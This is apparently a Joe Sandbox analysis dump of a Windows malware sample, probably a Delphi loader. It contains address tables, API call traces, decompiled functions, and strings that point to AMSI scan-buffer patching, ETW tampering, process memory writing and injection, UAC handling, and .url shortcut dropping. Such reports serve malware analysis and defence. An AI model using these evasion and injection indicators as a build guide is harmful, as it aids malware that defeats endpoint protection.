                    0x032807ba
                    0x032807c5
                    0x032807d7
                    0x032807ef
                    0x032807fa
                    0x032807fb
                    0x03280800
                    0x03280805
                    0x0328080b
                    0x0328081b
                    0x03280833
                    0x0328083e
                    0x03280850
                    0x03280868
                    0x03280873
                    0x03280874
                    0x0328087e
                    0x03280884
                    0x0328088c
                    0x03280891
                    0x03280891
                    0x0328089a
                    0x032808a7
                    0x032808ac
                    0x032808b1
                    0x032808b7
                    0x032808c7
                    0x032808df
                    0x032808ea
                    0x032808fc
                    0x03280914
                    0x0328091f
                    0x03280920
                    0x03280925
                    0x0328092a
                    0x03280930
                    0x03280940
                    0x03280958
                    0x03280963
                    0x03280975
                    0x0328098d
                    0x03280998
                    0x03280999
                    0x0328099e
                    0x032809a3
                    0x032809a9
                    0x032809b9
                    0x032809d1
                    0x032809dc
                    0x032809ee
                    0x03280a06
                    0x03280a11
                    0x03280a12
                    0x03280a17
                    0x03280a1c
                    0x03280a22
                    0x03280a32
                    0x03280a4a
                    0x03280a55
                    0x03280a67
                    0x03280a7f
                    0x03280a8a
                    0x03280a8b
                    0x03280a9a
                    0x03280a9f
                    0x03281bcc
                    0x03281bcc
                    0x03281bd1
                    0x03281bd7
                    0x03281be7
                    0x03281bff
                    0x03281c0a
                    0x03281c1c
                    0x03281c34
                    0x03281c3f
                    0x03281c40
                    0x03281c45
                    0x03281c4a
                    0x03281c50
                    0x03281c60
                    0x03281c78
                    0x03281c83
                    0x03281c95
                    0x03281cad
                    0x03281cb8
                    0x03281cb9
                    0x03281ccf
                    0x03281cdf
                    0x03281ce4
                    0x03281ce9
                    0x03281cef
                    0x03281cff
                    0x03281d17
                    0x03281d22
                    0x03281d34
                    0x03281d4c
                    0x03281d57
                    0x03281d58
                    0x03281d5d
                    0x03281d62
                    0x03281d68
                    0x03281d78
                    0x03281d90
                    0x03281d9b
                    0x03281dad
                    0x03281dc5
                    0x03281dd0
                    0x03281dd1
                    0x03281dd6
                    0x03281ddb
                    0x03281de1
                    0x03281df1
                    0x03281e09
                    0x03281e14
                    0x03281e26
                    0x03281e3e
                    0x03281e49
                    0x03281e4a
                    0x03281e66
                    0x03281e76
                    0x03281e7b
                    0x03281e80
                    0x03281e86
                    0x03281e96
                    0x03281eae
                    0x03281eb9
                    0x03281ecb
                    0x03281ee3
                    0x03281eee
                    0x03281eef
                    0x03281ef4
                    0x03281ef9
                    0x03281eff
                    0x03281f0f
                    0x03281f27
                    0x03281f32
                    0x03281f44
                    0x03281f5c
                    0x03281f67
                    0x03281f68
                    0x03281f6d
                    0x03281f72
                    0x03281f78
                    0x03281f88
                    0x03281fa0
                    0x03281fab
                    0x03281fbd
                    0x03281fd5
                    0x03281fe0
                    0x03281fe1
                    0x03281ff1
                    0x03282002
                    0x03282012
                    0x03282017
                    0x0328201c
                    0x03282022
                    0x03282032
                    0x0328204a
                    0x03282055
                    0x03282067
                    0x0328207f
                    0x0328208a
                    0x0328208b
                    0x03282090
                    0x03282095
                    0x0328209b
                    0x032820ab
                    0x032820c3
                    0x032820ce
                    0x032820e0
                    0x032820f8
                    0x03282103
                    0x03282104
                    0x03282109
                    0x0328210e
                    0x03282114
                    0x03282124
                    0x0328213c
                    0x03282147
                    0x03282159
                    0x03282171
                    0x0328217c
                    0x0328217d
                    0x0328218c
                    0x03282191
                    0x03283c56
                    0x03283c56
                    0x03283c5b
                    0x03283c61
                    0x03283c71
                    0x03283c89
                    0x03283c94
                    0x03283ca6
                    0x03283cbe
                    0x03283cc9
                    0x03283cca
                    0x03283ccf
                    0x03283cd4
                    0x03283cda
                    0x03283cea
                    0x03283d02
                    0x03283d0d
                    0x03283d1f
                    0x03283d37
                    0x03283d42
                    0x03283d43
                    0x03283d48
                    0x03283d4d
                    0x03283d53
                    0x03283d63
                    0x03283d7b
                    0x03283d86
                    0x03283d98
                    0x03283db0
                    0x03283dbb
                    0x03283dbc
                    0x03283dcb
                    0x03283dd0
                    0x0328473f
                    0x03284744
                    0x0328474a
                    0x0328475a
                    0x03284772
                    0x0328477d
                    0x0328478f
                    0x032847a7
                    0x032847b2
                    0x032847b3
                    0x032847b8
                    0x032847bd
                    0x032847c3
                    0x032847d3
                    0x032847eb
                    0x032847f6
                    0x03284808
                    0x03284820
                    0x0328482b
                    0x0328482c
                    0x03284831
                    0x03284836
                    0x0328483c
                    0x0328484c
                    0x03284864
                    0x0328486f
                    0x03284881
                    0x03284899
                    0x032848a4
                    0x032848a5
                    0x032848aa
                    0x032848af
                    0x032848b5
                    0x032848c5
                    0x032848dd
                    0x032848e8
                    0x032848fa
                    0x03284912
                    0x0328491d
                    0x0328491e
                    0x03284923
                    0x03284928
                    0x0328492e
                    0x0328493e
                    0x03284956
                    0x03284961
                    0x03284973
                    0x0328498b
                    0x03284996
                    0x03284997
                    0x0328499c
                    0x032849a1
                    0x032849a7
                    0x032849b7
                    0x032849cf
                    0x032849da
                    0x032849ec
                    0x03284a04
                    0x03284a0f
                    0x03284a10
                    0x03284a1f
                    0x03284a24
                    0x03284a2a
                    0x03284a2f
                    0x03284a35
                    0x03284a45
                    0x03284a5d
                    0x03284a68
                    0x03284a7a
                    0x03284a92
                    0x03284a9d
                    0x03284a9e
                    0x03284aa3
                    0x03284aa8
                    0x03284aae
                    0x03284abe
                    0x03284ad6
                    0x03284ae1
                    0x03284af3
                    0x03284b0b
                    0x03284b16
                    0x03284b17
                    0x03284b1c
                    0x03284b21
                    0x03284b27
                    0x03284b37
                    0x03284b4f
                    0x03284b5a
                    0x03284b6c
                    0x03284b84
                    0x03284b8f
                    0x03284b90
                    0x03284bbc
                    0x03284bd4
                    0x03284bed
                    0x03284bf2
                    0x03284bf4
                    0x03284bf6
                    0x03284bfb
                    0x03284c01
                    0x03284c11
                    0x03284c29
                    0x03284c34
                    0x03284c46
                    0x03284c5e
                    0x03284c69
                    0x03284c6a
                    0x03284c6a
                    0x03284c6f
                    0x03284c74
                    0x03284c7a
                    0x03284c8a
                    0x03284ca2
                    0x03284cad
                    0x03284cbf
                    0x03284cd7
                    0x03284ce2
                    0x03284ce3
                    0x03284ce8
                    0x03284ced
                    0x03284cf3
                    0x03284d03
                    0x03284d1b
                    0x03284d26
                    0x03284d38
                    0x03284d50
                    0x03284d5b
                    0x03284d5c
                    0x03284d66
                    0x03284d6c
                    0x03284d72
                    0x03284d74
                    0x03284d76
                    0x03284d76
                    0x03284d79
                    0x03284d79
                    0x03284d8e
                    0x03284d93
                    0x03284d98
                    0x03284d9e
                    0x03284dae
                    0x03284dc6
                    0x03284dd1
                    0x03284de3
                    0x03284dfb
                    0x03284e06
                    0x03284e07
                    0x03284e0c
                    0x03284e11
                    0x03284e17
                    0x03284e27
                    0x03284e3f
                    0x03284e4a
                    0x03284e5c
                    0x03284e74
                    0x03284e7f
                    0x03284e80
                    0x03284e99
                    0x03284e9e
                    0x03284ea5
                    0x03284ea7
                    0x03284eac
                    0x03284eb2
                    0x03284ec2
                    0x03284eda
                    0x03284ee5
                    0x03284ef7
                    0x03284f0f
                    0x03284f1a
                    0x03284f1b
                    0x03284f1b
                    0x03284f20
                    0x03284f25
                    0x03284f2b
                    0x03284f3b
                    0x03284f53
                    0x03284f5e
                    0x03284f70
                    0x03284f88
                    0x03284f93
                    0x03284f94
                    0x03284fab
                    0x03284fb0
                    0x03284fb5
                    0x03284fbb
                    0x03284fcb
                    0x03284fe3
                    0x03284fee
                    0x03285000
                    0x03285018
                    0x03285023
                    0x03285024
                    0x03285029
                    0x0328502e
                    0x03285034
                    0x03285044
                    0x0328505c
                    0x03285067
                    0x03285079
                    0x03285091
                    0x0328509c
                    0x0328509d
                    0x032850a8
                    0x032850ad
                    0x032850b2
                    0x032850b8
                    0x032850c8
                    0x032850e0
                    0x032850eb
                    0x032850fd
                    0x03285115
                    0x03285120
                    0x03285121
                    0x03285126
                    0x0328512b
                    0x03285131
                    0x03285141
                    0x03285159
                    0x03285164
                    0x03285176
                    0x0328518e
                    0x03285199
                    0x0328519a
                    0x0328519f
                    0x032851a4
                    0x032851aa
                    0x032851ba
                    0x032851d2
                    0x032851dd
                    0x032851ef
                    0x03285207
                    0x03285212
                    0x03285213
                    0x03285227
                    0x0328523b
                    0x0328524f
                    0x03285263
                    0x03285277
                    0x0328528b
                    0x0328529f
                    0x032852b3
                    0x032852be
                    0x032852be
                    0x032852cd
                    0x032852d2
                    0x032852d8
                    0x032852dd
                    0x032852e3
                    0x032852f3
                    0x0328530b
                    0x03285316
                    0x03285328
                    0x03285340
                    0x0328534b
                    0x0328534c
                    0x03285351
                    0x03285356
                    0x0328535c
                    0x0328536c
                    0x03285384
                    0x0328538f
                    0x032853a1
                    0x032853b9
                    0x032853c4
                    0x032853c5
                    0x032853ca
                    0x032853d0
                    0x032853e0
                    0x032853e5
                    0x032853eb
                    0x032853f0
                    0x032853f2
                    0x032853f7
                    0x032853f9
                    0x03285409
                    0x03285420
                    0x03285425
                    0x0328542a
                    0x03285430
                    0x03285440
                    0x03285458
                    0x03285463
                    0x03285475
                    0x0328548d
                    0x03285498
                    0x03285499
                    0x0328549e
                    0x032854a3
                    0x032854a9
                    0x032854b9
                    0x032854d1
                    0x032854dc
                    0x032854ee
                    0x03285506
                    0x03285511
                    0x03285512
                    0x03285517
                    0x0328551c
                    0x03285522
                    0x03285532
                    0x0328554a
                    0x03285555
                    0x03285567
                    0x0328557f
                    0x0328558a
                    0x0328558b
                    0x03285595
                    0x0328559a
                    0x0328559c
                    0x032855a2
                    0x032855a7
                    0x032855ad
                    0x032855bd
                    0x032855d5
                    0x032855e0
                    0x032855f2
                    0x0328560a
                    0x03285615
                    0x03285616
                    0x0328561b
                    0x03285620
                    0x03285626
                    0x03285636
                    0x0328564e
                    0x03285659
                    0x0328566b
                    0x03285683
                    0x0328568e
                    0x0328568f
                    0x032856a4
                    0x032856b4
                    0x032856b9
                    0x032856be
                    0x032856c4
                    0x032856d4
                    0x032856ec
                    0x032856f7
                    0x03285709
                    0x03285721
                    0x0328572c
                    0x0328572d
                    0x03285732
                    0x03285737
                    0x0328573d
                    0x0328574d
                    0x03285765
                    0x03285770
                    0x03285782
                    0x0328579a
                    0x032857a5
                    0x032857a6
                    0x032857b7
                    0x032857c2
                    0x032857cf
                    0x032857e0
                    0x032857eb
                    0x032857ec
                    0x032857ec
                    0x032857f1
                    0x032857f6
                    0x032857fc
                    0x0328580c
                    0x03285824
                    0x0328582f
                    0x03285841
                    0x03285859
                    0x03285864
                    0x03285865
                    0x0328586a
                    0x0328586f
                    0x03285875
                    0x03285885
                    0x0328589d
                    0x032858a8
                    0x032858ba
                    0x032858d2
                    0x032858dd
                    0x032858de
                    0x032858e3
                    0x032858e8
                    0x032858ee
                    0x032858fe
                    0x03285916
                    0x03285921
                    0x03285933
                    0x0328594b
                    0x03285956
                    0x03285957
                    0x0328596d
                    0x0328596d
                    0x03285972
                    0x03285977
                    0x0328597d
                    0x0328598d
                    0x032859a5
                    0x032859b0
                    0x032859c2
                    0x032859da
                    0x032859e5
                    0x032859e6
                    0x032859eb
                    0x032859f0
                    0x032859f6
                    0x03285a06
                    0x03285a1e
                    0x03285a29
                    0x03285a3b
                    0x03285a53
                    0x03285a5e
                    0x03285a5f
                    0x03285a64
                    0x03285a69
                    0x03285a6f
                    0x03285a7f
                    0x03285a97
                    0x03285aa2
                    0x03285ab4
                    0x03285acc
                    0x03285ad7
                    0x03285ad8
                    0x03285ae8
                    0x03285af3
                    0x03285aff
                    0x03285b0a
                    0x03285b0b
                    0x03285b10
                    0x03285b15
                    0x03285b1b
                    0x03285b2b
                    0x03285b43
                    0x03285b4e
                    0x03285b60
                    0x03285b78
                    0x03285b83
                    0x03285b84
                    0x03285b89
                    0x03285b8e
                    0x03285b94
                    0x03285ba4
                    0x03285bbc
                    0x03285bc7
                    0x03285bd9
                    0x03285bf1
                    0x03285bfc
                    0x03285bfd
                    0x03285c02
                    0x03285c07
                    0x03285c0d
                    0x03285c1d
                    0x03285c35
                    0x03285c40
                    0x03285c47
                    0x03285c52
                    0x03285c6a
                    0x03285c75
                    0x03285c76
                    0x03285c86
                    0x03285c91
                    0x03285c9d
                    0x03285ca8
                    0x03285ca9
                    0x03285cb9
                    0x03285cc4
                    0x03285cd0
                    0x03285cdb
                    0x03285cdc
                    0x03285cec
                    0x03285cf7
                    0x03285d03
                    0x03285d0e
                    0x03285d0f
                    0x03285d1f
                    0x03285d2a
                    0x03285d36
                    0x03285d41
                    0x03285d42
                    0x03285d52
                    0x03285d5d
                    0x03285d69
                    0x03285d74
                    0x03285d75
                    0x03285d85
                    0x03285d90
                    0x03285d9c
                    0x03285da7
                    0x03285da8
                    0x03285db8
                    0x03285dc3
                    0x03285dcf
                    0x03285dda
                    0x03285ddb
                    0x03285deb
                    0x03285df6
                    0x03285e02
                    0x03285e0d
                    0x03285e0e
                    0x03285e1e
                    0x03285e29
                    0x03285e35
                    0x03285e40
                    0x03285e41
                    0x03285e50
                    0x03285e5f
                    0x03285e6e
                    0x03285e7d
                    0x03285e8c
                    0x03285e9b
                    0x03285eaa
                    0x03285eb9
                    0x03285ec8
                    0x03285ed7
                    0x03285ee6
                    0x03285ef5
                    0x03285f04
                    0x03285f13
                    0x03285f22
                    0x03285f31
                    0x03285f36
                    0x03285f3b
                    0x03285f41
                    0x03285f51
                    0x03285f69
                    0x03285f74
                    0x03285f86
                    0x03285f9e
                    0x03285fa9
                    0x03285faa
                    0x03285faf
                    0x03285fb4
                    0x03285fba
                    0x03285fca
                    0x03285fe2
                    0x03285fed
                    0x03285fff
                    0x03286017
                    0x03286022
                    0x03286023
                    0x03286028
                    0x0328602d
                    0x03286033
                    0x03286043
                    0x0328605b
                    0x03286066
                    0x0328606d
                    0x03286078
                    0x03286090
                    0x0328609b
                    0x0328609c
                    0x032860ac
                    0x032860b7
                    0x032860c3
                    0x032860ce
                    0x032860cf
                    0x032860df
                    0x032860ea
                    0x032860f6
                    0x03286101
                    0x03286102
                    0x03286112
                    0x0328611d
                    0x03286129
                    0x03286134
                    0x03286135
                    0x03286145
                    0x03286150
                    0x0328615c
                    0x03286167
                    0x03286168
                    0x03286178
                    0x03286183
                    0x0328618f
                    0x0328619a
                    0x0328619b
                    0x032861ab
                    0x032861b6
                    0x032861c2
                    0x032861cd
                    0x032861ce
                    0x032861de
                    0x032861e9
                    0x032861f5
                    0x03286200
                    0x03286201
                    0x03286211
                    0x0328621c
                    0x03286228
                    0x03286233
                    0x03286234
                    0x03286244
                    0x0328624f
                    0x0328625b
                    0x03286266
                    0x03286267
                    0x03286277
                    0x03286282
                    0x0328628e
                    0x03286299
                    0x0328629a
                    0x032862aa
                    0x032862b5
                    0x032862c1
                    0x032862cc
                    0x032862cd
                    0x032862dd
                    0x032862e8
                    0x032862f4
                    0x032862ff
                    0x03286300
                    0x03286310
                    0x0328631b
                    0x03286327
                    0x03286332
                    0x03286333
                    0x03286343
                    0x0328634e
                    0x0328635a
                    0x03286365
                    0x03286366
                    0x03286376
                    0x03286381
                    0x0328638d
                    0x03286398
                    0x03286399
                    0x032863a9
                    0x032863b4
                    0x032863c0
                    0x032863cb
                    0x032863cc
                    0x032863dc
                    0x032863e7
                    0x032863f3
                    0x032863fe
                    0x032863ff
                    0x0328640f
                    0x0328641a
                    0x03286426
                    0x03286431
                    0x03286432
                    0x03286442
                    0x0328644d
                    0x03286459

                    APIs
                    • InetIsOffline.URL(000008AE,00000000,03286A6B,?,?,00000259,00000000,00000000), ref: 0327D8D9
                      • Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                      • Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                      • Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                      • Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                      • Part of subcall function 03262EE0: QueryPerformanceCounter.KERNEL32 ref: 03262EE4
                      • Part of subcall function 03267E40: GetFileAttributesA.KERNEL32(00000000,03392880,0327DEBB,ScanString,03286AA0,ScanBuffer,03286AA0,UacInitialize,03286AA0,UacScan,03286AA0,Initialize,03286AA0,ScanBuffer,03286AA0,OpenSession), ref: 03267E4B
                      • Part of subcall function 03267E64: GetFileAttributesA.KERNEL32(00000000,03392880,0328066B,ScanString,03286AA0,OpenSession,03286AA0,ScanBuffer,03286AA0,OpenSession,03286AA0,ScanString,03286AA0,Initialize,03286AA0,ScanBuffer), ref: 03267E6F
                      • Part of subcall function 0326802C: CreateDirectoryA.KERNEL32(00000000,00000000,03392880,03280787,ScanBuffer,03286AA0,Initialize,03286AA0,ScanString,03286AA0,OpenSession,03286AA0,ScanBuffer,03286AA0,OpenSession,03286AA0), ref: 03268039
                      • Part of subcall function 0327CB04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CBD6), ref: 0327CB43
                      • Part of subcall function 0327CB04: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0327CB7D
                      • Part of subcall function 0327CB04: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0327CBAA
                      • Part of subcall function 0327CB04: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0327CBB3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: File$AttributesCreateLibraryPath$AddressCloseCounterDirectoryFreeHandleInetLoadModuleNameName_OfflinePerformanceProcQueryWrite
                    • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$ScanBuffer$ScanString$SetUnhandledExceptionFilter$TrustOpenStores$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$wintrust$ws2_32
                    • API String ID: 598625507-512624929
                    • Opcode ID: 7f302017b6b34972a9e959ba0e0f2c91240a33012cddaa84eedaee5b5fa0511d
                    • Instruction ID: f8acb26069c816b1e835857adb3d1ffffb074d93317ce069146aac9330f8325c
                    • Opcode Fuzzy Hash: 7f302017b6b34972a9e959ba0e0f2c91240a33012cddaa84eedaee5b5fa0511d
                    • Instruction Fuzzy Hash: E3D34D39B2125C9FDB11FB65DC80ADE73B9EF85301F5084E29148AB254DEB1AEC58F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E03265A90(CHAR* __eax) {
                    				CHAR* _v8;
                    				void* _v12;
                    				char _v15;
                    				char _v17;
                    				char _v18;
                    				char _v22;
                    				int _v28;
                    				char _v289;
                    				long _t44;
                    				long _t61;
                    				long _t63;
                    				CHAR* _t74;
                    				CHAR* _t99;
                    				CHAR* _t100;
                    				intOrPtr _t104;
                    				struct HINSTANCE__* _t112;
                    				void* _t115;
                    				void* _t117;
                    				intOrPtr _t118;
                    
                    				_t115 = _t117;
                    				_t118 = _t117 + 0xfffffee0;
                    				_v8 = __eax;
                    				GetModuleFileNameA(0,  &_v289, 0x105);
                    				_v22 = 0;
                    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                    				if(_t44 == 0) {
                    					L3:
                    					_push(_t115);
                    					_push(0x3265b95);
                    					_push( *[fs:eax]);
                    					 *[fs:eax] = _t118;
                    					_v28 = 5;
                    					E032658CC( &_v289, 0x105);
                    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E03265CFC, 0, 0,  &_v22,  &_v28) != 0) {
                    						_v22 = 0;
                    					}
                    					_v18 = 0;
                    					_pop(_t104);
                    					 *[fs:eax] = _t104;
                    					_push(E03265B9C);
                    					return RegCloseKey(_v12);
                    				} else {
                    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                    					if(_t61 == 0) {
                    						goto L3;
                    					} else {
                    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                    						if(_t63 != 0) {
                    							lstrcpynA( &_v289, _v8, 0x105);
                    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
                    							_t112 = 0;
                    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                    								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
                    								while( *_t99 != 0x2e && _t99 !=  &_v289) {
                    									_t99 = _t99 - 1;
                    								}
                    								_t74 =  &_v289;
                    								if(_t99 != _t74) {
                    									_t100 =  &(_t99[1]);
                    									if(_v22 != 0) {
                    										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
                    										_t112 = LoadLibraryExA( &_v289, 0, 2);
                    									}
                    									if(_t112 == 0 && _v17 != 0) {
                    										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                    										_t112 = LoadLibraryExA( &_v289, 0, 2);
                    										if(_t112 == 0) {
                    											_v15 = 0;
                    											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                    											_t112 = LoadLibraryExA( &_v289, 0, 2);
                    										}
                    									}
                    								}
                    							}
                    							return _t112;
                    						} else {
                    							goto L3;
                    						}
                    					}
                    				}
                    			}























                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,03260000,03289790), ref: 03265AAC
                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265ACA
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265AE8
                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03265B06
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03265B4F
                    • RegQueryValueExA.ADVAPI32(?,03265CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001), ref: 03265B6D
                    • RegCloseKey.ADVAPI32(?,03265B9C,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03265B8F
                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03265BAC
                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03265BB9
                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03265BBF
                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03265BEA
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C31
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C41
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C69
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C79
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03265C9F
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03265CAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                    • API String ID: 1759228003-2375825460
                    • Opcode ID: ce4e145d19a5e8b9408aa936956d2afb664d99c951fcce5909afcc0c12109b55
                    • Instruction ID: c0b279d8a70ff75f6e0777050dd92238ea85b0d156c568c7560f366b3ed408ee
                    • Opcode Fuzzy Hash: ce4e145d19a5e8b9408aa936956d2afb664d99c951fcce5909afcc0c12109b55
                    • Instruction Fuzzy Hash: C051C775A6031D7EFB21D6A4CC46FEFB7AC9F05740F5401A5A700EA1C1E6B4BAC48BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 31%
                    			E0327CBE8(char __eax, void* __ebx, void* __edx, void* __esi) {
                    				char _v8;
                    				void* _v12;
                    				char _v20;
                    				void* _v28;
                    				void* _v52;
                    				intOrPtr _v68;
                    				void _v76;
                    				void* _t49;
                    				intOrPtr _t56;
                    				intOrPtr _t58;
                    				void* _t61;
                    
                    				_t49 = __edx;
                    				_v8 = __eax;
                    				E03264EE4( &_v8);
                    				_push(_t61);
                    				_push(0x327ccb8);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t61 + 0xffffffb8;
                    				E032644A0(_t49);
                    				_push(0);
                    				_push(0);
                    				_push( &_v20);
                    				_push(E03264DB4(_v8));
                    				L0327CA44();
                    				E0327CA4C( &_v52, 0x40,  &_v20, 0, 0, 0);
                    				NtOpenFile( &_v12, 0x100001,  &_v52,  &_v28, 1, 0x20); // executed
                    				NtQueryInformationFile(_v12,  &_v28,  &_v76, 0x18, 5);
                    				_t58 = _v68;
                    				E03264B90(_t49, _t58);
                    				_push(0);
                    				_push(0);
                    				_push(_t58);
                    				_push(E032649BC(_t49));
                    				_push( &_v28);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(_v12); // executed
                    				L03277D28(); // executed
                    				NtClose(_v12);
                    				_pop(_t56);
                    				 *[fs:eax] = _t56;
                    				_push(0x327ccbf);
                    				return E03264C24( &_v8);
                    			}

                    APIs
                      • Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2
                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CCB8), ref: 0327CC23
